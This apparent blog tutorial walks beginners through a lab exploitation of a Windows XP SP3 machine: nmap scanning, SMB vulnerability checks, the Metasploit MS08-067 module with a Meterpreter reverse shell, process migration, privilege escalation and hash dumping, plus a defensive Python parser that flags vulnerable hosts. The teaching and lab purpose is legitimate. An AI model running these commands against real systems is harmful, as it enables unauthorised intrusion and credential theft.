Basic Introduction to Metasploit Framework
Hey Guys, are you ready for owning our first machine?
Yes, today we go together into the world of ethical hacking: we try to exploit our first machine, but not like script kiddies, rather with the five steps of a professional pentest… yes, the machine has an old operating system on board, yes, the exploit is also old, but I hope you understand all our steps and, with patience and study, you can exploit newer machines in the same manner….
For this lab I use an old Windows XP SP3 (Italian) and my favorite attacking machine with BackTrack 5 R3 x64; the IP address of the target is 192.168.254.11/24 and my IP is 192.168.254.3/24. This article is for beginners, so just a word on setting the attacker's IP address: BT 5 R3 has a DHCP client daemon, dhclient3, started by default, but I can set my IP statically with three simple commands:
ifconfig eth0 192.168.254.3/24 → for setting IP and subnet
route add default gw 192.168.254.254 → for setting the default gateway
echo nameserver 8.8.8.8 > /etc/resolv.conf → for setting the DNS server; here I use Google's DNS server
You can stop the dhcp client service with → killall dhclient3; without this command you can lose your IP when the dhclient timeout ends and the daemon starts with a new DHCPDISCOVER.
If you prefer dhcp, you can force the process with the command → dhclient3 (Figure 2).
Figure 2. Start dhcp client
For a more realistic environment I have installed on the target machine Avast Free Antivirus ed. 2012 with the latest signature database (Figure 3).
Normally I use VMware Workstation for my labs; today I am using version 9.0.1. The network setup doesn't matter much: now I work in bridged mode, but you can use your preferred configuration, the only requirement is to set up all virtual machines in the same manner.
Now I will work in a professional way, like an ethical hacker and not a black hat; to do this I need to respect the ROE (rules of engagement) to ensure the SLA (service level agreement), but this is not enough: to ensure metrics and repeatability we need to use a well-known methodology. It is out of scope for this article to explain in detail a complex methodology like OSSTMM, but the simplest methodology is the use of five steps: two steps of the pre-attack phase, the attack phase, and two steps of the post-attack phase.
Step 1 – Scanning
For this purpose I use nmap; in my opinion nmap is the best choice for network scanning. You can scan the network in many ways, but if your ROE includes low noise you can't use the scanner with all default settings, like:
nmap 192.168.254.11 (just for timing, I work with the single IP and not with the entire subnet)
If I use all nmap defaults I will scan 1000 ports (http://nmap.org/book/man-port-specification.html) with T3 timing; with T3 nmap includes parallelization of scanned ports (T0 waits 5 min. between sending each probe, T1 waits 15 sec. and T2 waits 0.4 sec.; see http://nmap.org/book/man-performance.html). For a stealthier scan I choose only a few ports, in my example ports 80, 139, 445, 21 and 3389, and I run:
nmap 192.168.254.11 -p 80,139,445,21,3389 -sV -O -T3
Figure 4. Scanning with nmap
Figure 5. smb-check-vulns script
The first interesting information is that ports 139 and 445 are open, and nmap also tries to discover the operating system version:
OS CPE: cpe:/o:microsoft:windows_xp::sp3 OS details: Microsoft Windows XP SP3
Mmmmh, if you are an experienced pentester the couple WinXP and port 139 (or 445) TCP open suggests an SMB vulnerability… ok, go deeper using nmap scripts…
Step 2 – Enumeration
We have a lot of tools and techniques for enumeration; if you are very aggressive you can use Nessus or OpenVAS or other vulnerability assessment tools. For this demo I will use some NSE scripts (NSE is the Nmap Scripting Engine); this kind of script can help you in a lot of situations, if you want to know more about NSE scripts you can
Figure 6. smb-os-discovery script
Figure 7. Run nmap scripts
My string becomes:
nmap 192.168.254.11 -p 139 --script=smb-os-discovery,smb-check-vulns --script-args=unsafe=1
After the scripts execute I can see that the target machine is vulnerable to the MS08-067 SMB remote buffer overflow; now I try to gain access to the target machine.
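To turn this scan output into a finding for the report (and for the blue team's patch list), here is an added Python example, not from the original post, that parses nmap's -oX XML output and flags hosts exposing SMB where the OS CPE says Windows XP and smb-check-vulns reports MS08-067. The XML below is a constructed sample modelled on the scan in this post; the exact script output text is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output (not real scan data), modelled on the
# scan in this post: XP SP3 host, 139/445 open, smb-check-vulns reporting MS08-067.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.168.254.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
    </ports>
    <os>
      <osmatch name="Microsoft Windows XP SP3" accuracy="100">
        <osclass type="general purpose" vendor="Microsoft" osfamily="Windows">
          <cpe>cpe:/o:microsoft:windows_xp::sp3</cpe>
        </osclass>
      </osmatch>
    </os>
    <hostscript>
      <script id="smb-check-vulns" output="MS08-067: VULNERABLE"/>
    </hostscript>
  </host>
</nmaprun>
"""

SMB_PORTS = {139, 445}


def open_ports(host):
    """Set of TCP/UDP port numbers whose <state> is 'open' for one <host> element."""
    return {int(p.get("portid")) for p in host.iter("port")
            if p.find("state") is not None and p.find("state").get("state") == "open"}


def smb_findings(xml_text):
    """One finding per host that exposes SMB; says whether it is legacy XP and MS08-067 vulnerable."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        smb_open = open_ports(host) & SMB_PORTS
        if not smb_open:
            continue  # no SMB exposure, nothing to report for this post's check
        cpes = [c.text or "" for c in host.iter("cpe")]
        # smb-check-vulns output is assumed to contain the literal "MS08-067: VULNERABLE"
        vuln_out = " ".join(s.get("output", "") for s in host.iter("script")
                            if s.get("id") == "smb-check-vulns")
        findings.append({"host": host.find("address").get("addr"),
                         "smb_ports": sorted(smb_open),
                         "legacy_os": any("windows_xp" in c for c in cpes),
                         "ms08_067": "MS08-067: VULNERABLE" in vuln_out})
    return findings
```

Any host with legacy_os and ms08_067 both true goes straight onto the patch/isolation list; hosts with only SMB open are still worth a note about perimeter filtering of 139/445.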
Figure 8. Search exploit with Google: http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
Figure 9. Exploit description in metasploit.com
If you are a n00b it is possible that you don't know what MS08-067 is… this is a GREAT exploit, just a little bit old, but great; you can use this exploit a lot of times even if you are using it against a machine already compromised, and if the exploit crashes, no problem, you can use it again. The next SMB exploit, MS09-050, is also a good exploit, but sometimes you can get a BSOD, and if your session crashes you aren't able to compromise the target again unless the machine is rebooted… no, MS08-067 is not like this… you can use it as many times as you want in any way you want… of course if the service is started :D.
But if you don't know this exploit… Google is your friend… if I put my question in Google: "metasploit ms08 067 netapi" you get the page on the metasploit.com site (Figures 8-10)…
As you can see, this exploit works with a lot of operating systems, from Windows 2000 Universal to Windows XP SP3; the exploit also has the default option "automatic targeting"… great…
Now I can start Metasploit on my attacking machine. In my installation Metasploit is in /git/metasploit/metasploit-framework; if your path is different you need to modify the change-directory command. On my machine:
cd /git/metasploit/metasploit-framework
It is also possible that your Metasploit path is in the executable search path; in this case you only need to call the Metasploit console…
Figure 10. Target OS for my exploit
OK, now I am in the correct directory and I can start msfconsole, my preferred Metasploit interface:
./msfconsole (if you are invoking the Metasploit console from another directory because the binary is in the executable search path, you must type only msfconsole without the "./"; Figure 11).
Now, if I don't know where the exploit is, I can search with the command:
search ms08-067
Figure 11. Starting msfconsole
Figure 12. Searching exploit in metasploit
Figure 13. Exploit info
Then I select my exploit, and with the command info I get, more or less, the same output as the web page (Figures 13 and 14).
I need to set my payload and the other required options. If I can, I use meterpreter, and the reverse payloads are very useful; you can also choose a payload like reverse_http that complies with protocol requirements (https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreterhttphttps-communication):
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.254.11
set LHOST 192.168.254.3
RHOST is the target machine, LHOST is the machine to which I want the reverse shell to come back.
With show options I can verify my settings and with exploit I can run my exploit.
In the real world I use exploit -j because with this option you can force the active module into the background (Figures 15 and 16).
Figure 14. Exploit info – cont
Figure 15. Setting exploit
Figure 16. Gotcha
Figure 17. Start interaction
Figure 18. Target processes
Figure 19. Migrate to another process
Figure 20. Password hashes
….mmmmhh… it is not so simple… you still have a long way to go… but this is your first 0wning… this is the beginning… now you can interact with your session using the command:
sessions -i 1
With getuid you can show your current user and with getpid you can see your process id; the command ps shows the processes. At this point you can migrate from your current process to another… in this case I want to migrate to the explorer process; this is a good process, normally users don't kill explorer until the machine is turned off.
In my example explorer has PID 1084 and I type:
migrate 1084
If I need SYSTEM privileges I can try privilege escalation with the getsystem command.
Figure 21. Oops
Figure 22. Avast wins
Figure 23. Ok, try again
Figure 24. Uninstall metsvc
Figure 25. Avast processes
Figure 26. Trying another way
Figure 27. Avast 2 – Persistence 0
Figure 28. Go to RDP
To Be Continued